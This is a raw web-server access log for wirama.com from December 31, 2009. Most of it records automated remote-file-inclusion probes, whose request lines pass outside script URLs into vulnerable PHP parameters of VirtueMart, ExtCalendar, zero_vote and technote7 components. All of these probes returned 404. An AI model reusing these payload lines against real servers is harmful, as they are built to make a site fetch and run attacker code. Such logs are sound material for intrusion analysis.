194.105.128.135 - - [31/Dec/2009:16:25:09 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:16:25:09 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:16:25:09 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:16:25:40 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [31/Dec/2009:16:29:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [31/Dec/2009:16:29:34 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [31/Dec/2009:16:29:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:16:32:24 -0800] "GET /logs/access_091201.log////skin/happycast_category_bluishgreen/setup.php?dir=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:16:32:25 -0800] "GET /logs/access_091031.log////skin/happycast_category_bluishgreen/setup.php?dir=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:16:32:25 -0800] "GET /logs////skin/happycast_category_bluishgreen/setup.php?dir=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:16:32:25 -0800] "GET ///skin/happycast_category_bluishgreen/setup.php?dir=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:07 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:10 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:19 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:16:43:20 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.74.245.40 - - [31/Dec/2009:16:47:12 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:34 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:34 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:43 -0800] "GET /logs/access_091101.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:43 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:45 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:51 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:51 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:51 -0800] "GET /logs/access_091101.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:49:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:49:58 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:50:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:50:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
94.45.33.18 - - [31/Dec/2009:16:50:36 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
94.45.33.18 - - [31/Dec/2009:16:50:36 -0800] "GET /logs/access_090329.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:16:50:43 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:16:50:43 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:59:23 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:59:23 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:16:59:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:17:03:34 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:17:03:34 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:17:03:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:17:03:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.62.136.226 - - [31/Dec/2009:17:03:48 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.62.136.226 - - [31/Dec/2009:17:03:53 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.62.136.226 - - [31/Dec/2009:17:07:02 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.62.136.226 - - [31/Dec/2009:17:07:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.62.136.226 - - [31/Dec/2009:17:07:03 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:06 -0800] "GET /pr02.htm HTTP/1.1" 404 - "http://www.wired.com/gadgetlab/2008/02/rfid-reader-to/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:06 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:09 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:23 -0800] "GET /pr02.htm HTTP/1.1" 404 - "http://www.wired.com/gadgetlab/2008/02/rfid-reader-to/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:31 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:55 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:09:58 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:03 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:11 -0800] "GET /logs/ HTTP/1.1" 200 3798 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:19 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:25 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:26 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:27 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
207.81.125.201 - - [31/Dec/2009:17:10:29 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.wirama.com"
67.195.112.187 - - [31/Dec/2009:17:12:24 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
67.195.112.187 - - [31/Dec/2009:17:12:53 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
66.235.124.132 - - [31/Dec/2009:17:18:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.235.124.132 - - [31/Dec/2009:17:18:39 -0800] "GET /logs/access_090331.log HTTP/1.1" 200 82112 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.wirama.com"
188.93.208.12 - - [31/Dec/2009:17:20:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [31/Dec/2009:17:20:26 -0800] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [31/Dec/2009:17:20:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.131 - - [31/Dec/2009:17:20:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
188.93.208.12 - - [31/Dec/2009:17:21:02 -0800] "GET /logs/access_091101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.131 - - [31/Dec/2009:17:21:12 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
91.121.11.58 - - [31/Dec/2009:17:21:45 -0800] "GET /logs//appserv/main.php?appserv_root=http://id.indonesia.co.cc/adu/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
91.121.11.58 - - [31/Dec/2009:17:21:45 -0800] "GET /appserv/main.php?appserv_root=http://id.indonesia.co.cc/adu/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
91.121.11.58 - - [31/Dec/2009:17:21:45 -0800] "GET /logs/access_090501.log//appserv/main.php?appserv_root=http://id.indonesia.co.cc/adu/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
208.80.193.38 - - [31/Dec/2009:17:30:54 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; .NET CLR 2.0.50727; IEMB3; SpamBlockerUtility 4.8.4; IEMB3)" "www.wirama.com"
188.93.208.12 - - [31/Dec/2009:17:33:05 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [31/Dec/2009:17:33:05 -0800] "GET /logs/access_091031.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [31/Dec/2009:17:33:05 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [31/Dec/2009:17:39:36 -0800] "GET /logs/access_090330.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.62.136.226 - - [31/Dec/2009:17:39:37 -0800] "GET /logs/access_090330.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:42:21 -0800] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:42:21 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:42:22 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:43:10 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:43:11 -0800] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:43:11 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:43:15 -0800] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.51.114 - - [31/Dec/2009:17:46:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.51.114 - - [31/Dec/2009:17:47:05 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
210.114.223.227 - - [31/Dec/2009:17:48:16 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:48:16 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:48:16 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:48:59 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:49:22 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:49:22 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:49:22 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.223.227 - - [31/Dec/2009:17:49:51 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cheermeister.com//moodle//files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.250.255.243 - - [31/Dec/2009:17:54:40 -0800] "GET /logs/access_090201.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
65.55.207.51 - - [31/Dec/2009:17:57:40 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.51 - - [31/Dec/2009:17:57:47 -0800] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.195.112.187 - - [31/Dec/2009:18:01:05 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
142.150.1.9 - - [31/Dec/2009:18:03:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:18:03:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:18:04:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:18:04:18 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:18:04:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:18:04:22 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.108 - - [31/Dec/2009:18:06:12 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:07:01 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:07:01 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:07:01 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
